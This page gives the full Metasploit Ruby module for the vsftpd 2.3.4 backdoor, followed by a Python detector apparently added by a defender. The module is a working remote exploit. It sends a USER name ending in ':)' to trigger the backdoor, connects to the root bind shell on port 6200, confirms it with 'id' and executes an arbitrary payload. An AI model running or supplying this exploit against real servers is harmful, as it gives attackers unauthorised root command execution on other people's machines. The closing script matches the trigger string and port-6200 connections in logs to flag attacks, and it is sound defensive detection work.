VSFTPD v2.3.4 Backdoor Command Execution Vulnerability
```ruby
##
# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
      'Description'    => %q{
          This module exploits a malicious backdoor that was added to the VSFTPD download
        archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
        June 30th 2011 and July 1st 2011 according to the most recent information
        available. This backdoor was removed on July 3rd 2011.
      },
      'Author'         => [ 'hdm', 'mc' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 13099 $',
      'References'     =>
        [
          [ 'URL', 'http://pastebin.com/AetT9sS5' ],
          [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ]
        ],
      'Privileged'     => true,
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType'    => 'cmd_interact',
              'ConnectionType' => 'find',
            },
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'Jul 3 2011',
      'DefaultTarget'  => 0))

    register_options([ Opt::RPORT(21) ], self.class)
  end

  def exploit

    # If the backdoor's bind listener is already up from an earlier trigger,
    # skip the FTP handshake and talk to it directly.
    nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
    if nsock
      print_status("The port used by the backdoor bind listener is already open")
      handle_backdoor(nsock)
      return
    end

    # Connect to the FTP service port first
    connect

    banner = sock.get_once(-1, 30).to_s
    print_status("Banner: #{banner.strip}")

    # The ":)" at the end of the username is the sequence the backdoored binary checks for
    sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")

    resp = sock.get_once(-1, 30).to_s
    print_status("USER: #{resp.strip}")

    if resp =~ /^530 /
      print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
      disconnect
      return
    end

    if resp !~ /^331 /
      print_error("This server did not respond as expected: #{resp.strip}")
      disconnect
      return
    end

    sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

    # Do not bother reading the response from password, just try the backdoor
    nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
    if nsock
      print_good("Backdoor service has been spawned, handling...")
      handle_backdoor(nsock)
      return
    end

    disconnect

  end

  def handle_backdoor(s)

    # Sanity check: a real shell on port 6200 answers "id" with a uid= line
    s.put("id\n")

    r = s.get_once(-1, 5).to_s
    if r !~ /uid=/
      print_error("The service on port 6200 does not appear to be a shell")
      disconnect(s)
      return
    end

    print_good("UID: #{r.strip}")

    s.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
    handler(s)
  end

end
```
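A defender-side check, added here as an example and not part of the forum post or of the Metasploit module: it runs the two indicators the module relies on (a USER command carrying the ":)" sequence, then a connection to TCP port 6200 from the same source) over constructed FTP session log lines in an assumed "<timestamp> <src_ip> <event> [arg]" format and grades each source host. It goes slightly beyond the module by matching the trigger anywhere in the username rather than only as the suffix the module sends.

```python
import re

BACKDOOR_PORT = 6200  # bind-shell port the module above connects to
TRIGGER = ":)"        # marker the module above sends inside the USER command

# Constructed sample log; assumed format "<ts> <src_ip> <event> [arg]", one
# line per FTP command or TCP connect seen by the server or a network sensor.
SAMPLE_LOG = """\
2011-07-02T10:00:01 10.0.0.5 CONNECT 21
2011-07-02T10:00:02 10.0.0.5 USER alice
2011-07-02T10:00:03 10.0.0.5 PASS ****
2011-07-02T10:05:10 10.0.0.9 CONNECT 21
2011-07-02T10:05:11 10.0.0.9 USER x7Kq:)
2011-07-02T10:05:12 10.0.0.9 PASS ****
2011-07-02T10:05:13 10.0.0.9 CONNECT 6200
2011-07-02T10:07:00 10.0.0.7 CONNECT 21
2011-07-02T10:07:01 10.0.0.7 USER bob:)carol
2011-07-02T10:09:00 10.0.0.3 CONNECT 6200
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+([A-Z]+)(?:\s+(.*))?$")

def find_events(log_text):
    """Return {src_ip: [(kind, timestamp, detail), ...]} for indicator lines."""
    events = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, cmd, arg = m.groups()
        arg = arg or ""
        if cmd == "USER" and TRIGGER in arg:
            events.setdefault(src, []).append(("trigger_username", ts, arg))
        elif cmd == "CONNECT" and arg == str(BACKDOOR_PORT):
            events.setdefault(src, []).append(("backdoor_port_connect", ts, arg))
    return events

def classify(events):
    """Grade each source: both indicators from one host is the complete chain."""
    verdicts = {}
    for src, evs in events.items():
        kinds = {kind for kind, _, _ in evs}
        if {"trigger_username", "backdoor_port_connect"} <= kinds:
            verdicts[src] = "high"    # trigger sent, then the shell port was reached
        elif "trigger_username" in kinds:
            verdicts[src] = "medium"  # trigger sent; server may be clean or patched
        else:
            verdicts[src] = "low"     # port 6200 touched with no trigger: a probe
    return verdicts
```

Correlating the two indicators per source host is what separates a successful trigger from plain port scanning of 6200.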